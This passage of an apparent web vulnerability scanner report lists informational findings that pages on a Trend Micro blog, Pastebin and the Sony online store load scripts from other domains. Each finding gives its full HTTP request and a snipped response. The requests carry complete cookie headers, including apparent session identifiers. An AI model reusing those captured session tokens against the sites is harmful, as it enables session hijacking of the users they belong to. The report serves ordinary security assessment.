"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.5. http://blog.trendmicro.com/category/pharming/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /category/pharming/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/pharming/ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.8.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=8; bn_u=6923713914570485926; cmRS=&t1=1315351074117&t2=1315351076030&t3=1315351267076&t4=1315351071147&lti=1315351267076&ln=&hr=/category/pharming/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/&rf=http%3A//blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
X-Varnish: 1696295149
Content-Length: 61490
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:21:03 GMT
Date: Tue, 06 Sep 2011 18:21:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.6. http://blog.trendmicro.com/trend-micro-researchers-identify-vulnerability-in-hotmail/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /trend-micro-researchers-identify-vulnerability-in-hotmail/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /trend-micro-researchers-identify-vulnerability-in-hotmail/ HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/category/exploits/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; CMAVID=50021315153052143970353; __utma=247958868.312697069.1315350994.1315350994.1315350994.1; __utmb=247958868.6.10.1315350994; __utmc=247958868; __utmz=247958868.1315350994.1.1.utmcsr=us.trendmicro.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/search/; wwsgd_visits=6; bn_u=6923713914570485926; cmRS=&t1=1315351031684&t2=1315351033496&t3=1315351039900&t4=1315351030127&lti=1315351039899&ln=&hr=/trend-micro-researchers-identify-vulnerability-in-hotmail/&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=&ho=analytics.trendmicro.com/cm%3F&ci=90302752%3B90369712&ul=http%3A//blog.trendmicro.com/category/exploits/&rf=http%3A//blog.trendmicro.com/blackhat-2011-dangers-of-embedded-web-servers/; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fexploits%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fblackhat-2011-dangers-of-embedded-web-servers%2F%22%2C%22t%22%3A1315351039907%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22de%22%3A%7B%22ti%22%3A%22Exploits%20%7C%20TrendLabs%20%7C%20Malware%20Blog%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A910%2C%22nl%22%3A117%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
X-Pingback: http://blog.trendmicro.com/xmlrpc.php
test : test
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Link: <http://blog.trendmicro.com/34090>; rel=shortlink
Link: <http://blog.trendmicro.com/?p=34090>; rel=shortlink
X-Varnish: 1696292645
Content-Length: 59377
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 06 Sep 2011 18:17:17 GMT
Date: Tue, 06 Sep 2011 18:17:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http:
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=3.2.1'></script>
...[SNIP]...
</div>
        <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"

type="text/javascript">


</script>
...[SNIP]...
</a>
        <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div>-->
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src='//libs.coremetrics.com/eluminate.js'></script>
...[SNIP]...

13.7. http://blog.trendmicro.com/wp-content/plugins/flash-gallery/js/addOnLoad.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /wp-content/plugins/flash-gallery/js/addOnLoad.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/plugins/flash-gallery/js/addOnLoad.js?ver=1 HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/?p=12640
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 02 Dec 2010 03:50:59 GMT
ETag: "18c4d1-2c1-49665546aeec0"
Accept-Ranges: bytes
Content-Length: 705
Content-Type: application/x-javascript
Date: Tue, 06 Sep 2011 18:16:27 GMT
Connection: close

/*http://core.trac.wordpress.org/changeset/6482*/
if(typeof addLoadEvent !== 'function'){addLoadEvent=(function(){var e=[],t,s,n,i,o,d=document,w=window,r='readyState',c='onreadystatechange',x=functi
...[SNIP]...
1;clearInterval(t);while(i=e.shift())i();if(s)s[c]=''};return function(f){if(n)return f();if(!e[0]){d.addEventListener&&d.addEventListener("DOMContentLoaded",x,false);/*@cc_on@*//*@if(@_win32)d.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

13.8. http://pastebin.com/bq8xJPMn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /bq8xJPMn

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bq8xJPMn HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=2; expires=Tue, 04-Oct-2011 18:10:35 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 373099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<link href="/i/style.css?12" rel="stylesheet" type="text/css" />
                       <script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End comScore Tag -->
       <script type="text/javascript" src="http://lolbin.net/stats.php"></script>
...[SNIP]...

13.9. http://pastebin.com/etc/ads/iframes/160x600.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/160x600.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /etc/ads/iframes/160x600.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/html
Last-Modified: Sat, 02 Jul 2011 13:17:48 GMT
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 650


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>

       <meta http-eq
...[SNIP]...
</script>
           <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"></script>
...[SNIP]...

13.10. http://pastebin.com/etc/ads/iframes/728x90.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/728x90.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /etc/ads/iframes/728x90.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/html
Last-Modified: Sat, 02 Jul 2011 13:17:34 GMT
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>

       <meta http-equi
...[SNIP]...
</script>
           <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"></script>
...[SNIP]...

13.11. http://pastebin.com/etc/social/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/social/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /etc/social/index.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/html
Last-Modified: Mon, 05 Sep 2011 09:11:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 923


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>

       <meta http-eq
...[SNIP]...
</title>
           <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
           <script src="http://connect.facebook.net/en_US/all.js#appId=150549571626327&amp;xfbml=1"></script>
...[SNIP]...

13.12. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://www.sony.com/SonySearch/Search?action=search&ti=0&pst=&pti=&first=1&st=xss+playstation
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s; sifrFetch=true; s_visit=1; s_sq=%5B%5BB%5D%5D; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.1.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; mbox=check#true#1315352981|session#1315352920400-736912#1315354781|PC#1315334914578-928682.19#1316562527; s_cc=true

Response

HTTP/1.1 200 OK
ntCoent-Length: 4923
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4923
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:35 GMT
Connection: close
Cache-Control: private
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Com
...[SNIP]...
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

13.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; 
TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 114876
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:50:12 GMT
Content-Length: 114876
Connection: close
Vary: Accept-Encoding
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

13.14. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Cteonnt-Length: 75919
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 75919
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:32 GMT
Connection: close
Cache-Control: private

